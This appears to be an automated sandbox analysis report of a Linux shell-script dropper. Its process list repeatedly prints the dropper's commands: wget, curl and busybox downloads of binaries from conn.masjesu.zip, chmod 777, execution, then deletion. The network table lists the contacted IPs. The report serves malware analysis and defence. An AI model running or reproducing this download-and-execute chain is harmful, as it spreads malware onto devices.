Analysis Overview
SHA256
9b233ed6c31bc80fa0c4571afa427c1dce8edbe9ce5fe2c2cbc640926d5d64f6
Threat Level: Shows suspicious behavior
The file 2408085a258a318bc587e649a5e777ad.bin was found to be: Shows suspicious behavior.
Malicious Activity Summary
File and Directory Permissions Modification
Executes dropped EXE
Checks CPU configuration
Reads runtime system information
System Network Configuration Discovery
Writes file to tmp directory
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-10 01:01
Signatures
Analysis: behavioral3
Detonation Overview
Submitted
2024-11-10 01:01
Reported
2024-11-10 01:04
Platform
debian9-mipsbe-20240611-en
Max time kernel
149s
Max time network
66s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO | /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO | N/A |
| N/A | /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J | /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J | N/A |
| N/A | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | N/A |
| N/A | /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 | /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 | N/A |
| N/A | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | N/A |
| N/A | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | N/A |
| N/A | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | N/A |
| N/A | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | N/A |
| N/A | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | N/A |
| N/A | /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 | /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 | N/A |
| N/A | /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y | /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y | N/A |
| N/A | /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF | /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF | N/A |
| N/A | /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl | /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl | N/A |
| N/A | /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug | /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug | N/A |
| N/A | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | N/A |
| N/A | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | N/A |
| N/A | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | N/A |
| N/A | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | N/A |
| N/A | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | N/A |
| N/A | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF | /usr/bin/curl | N/A |
| File opened for modification | /tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl | /usr/bin/curl | N/A |
| File opened for modification | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | /usr/bin/curl | N/A |
| File opened for modification | /tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV | /usr/bin/curl | N/A |
| File opened for modification | /tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug | /usr/bin/curl | N/A |
| File opened for modification | /tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO | /usr/bin/curl | N/A |
| File opened for modification | /tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J | /usr/bin/curl | N/A |
| File opened for modification | /tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc | /usr/bin/curl | N/A |
Processes
/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh
[/tmp/208f87f17e8dcc98e856d3b7ce07c4aa005b9390fc6ee96c3fd1ba0ca38cd537.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/bin/chmod
[chmod 777 d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/tmp/d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO
[./d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/bin/rm
[rm d6WMz7I6vaEJFeL7J0zRZyYZ3MouaVpSMO]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/bin/chmod
[chmod 777 b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/tmp/b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J
[./b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/bin/rm
[rm b4EEWLaCO1jUS9ghk2XYBZQrLjLaXodB0J]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/chmod
[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/rm
[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/bin/chmod
[chmod 777 trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/tmp/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3
[./trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/bin/rm
[rm trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/chmod
[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/rm
[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/chmod
[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/rm
[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/chmod
[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/rm
[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/chmod
[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/rm
[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/chmod
[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/rm
[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/bin/chmod
[chmod 777 pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/tmp/pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5
[./pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/bin/rm
[rm pgXvwNQv3ymcGfJbVdCTI2c7vfCLcH1xj5]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/bin/chmod
[chmod 777 wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/tmp/wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y
[./wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/bin/rm
[rm wkpNZ2v13SwoIlEKqYQFzImGVKNGRALj3y]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/bin/chmod
[chmod 777 mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/tmp/mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF
[./mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/bin/rm
[rm mHRjpSghZ90EoC3CS8OlM8GtYaIk53ovnF]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]
/bin/chmod
[chmod 777 hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]
/tmp/hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl
[./hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]
/bin/rm
[rm hwWR62XfsZaEQXPNSWWZ2esDst57v7Zudl]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]
/bin/chmod
[chmod 777 nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]
/tmp/nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug
[./nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]
/bin/rm
[rm nna1tBnMuEdluE4QBbRNp9nEdX5f9IHiug]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/chmod
[chmod 777 qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/tmp/qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt
[./qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/bin/rm
[rm qScpKyGJeCreL2XWJ3OKOcaGmCmRpZK7Mt]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/chmod
[chmod 777 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/tmp/6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV
[./6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/bin/rm
[rm 6himKdLqHHEMbBtbm1DeYVOzpj21Th3IAV]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/chmod
[chmod 777 z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/tmp/z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B
[./z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/bin/rm
[rm z0lcKTwAj5LA3ABgZ5RVHKQoVSnCaLFy7B]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/chmod
[chmod 777 qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/tmp/qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc
[./qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/bin/rm
[rm qf0kS2iyPXuhBGNRh2RHl3lRpE9HFl5Yuc]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/chmod
[chmod 777 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/tmp/619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR
[./619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/bin/rm
[rm 619pP1JJoAwunuV4KJ96kdYmPBNHCmrxVR]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/busybox
[/bin/busybox wget http://conn.masjesu.zip/bins/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/chmod
[chmod 777 V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/tmp/V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv
[./V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/bin/rm
[rm V0VlgxB8iN5MNVE4LHbuzIhxuHB32oQzpv]
/usr/bin/wget
[wget http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
/usr/bin/curl
[curl -O http://conn.masjesu.zip/bins/trEgYoMTzvr90Fuh1ua7Obxt8yblVW0fB3]
Network
| Country | Destination | Domain | Proto |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| DE | 87.120.84.230:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
| US | 216.126.231.240:80 | conn.masjesu.zip | tcp |
| US | 1.1.1.1:53 | conn.masjesu.zip | udp |
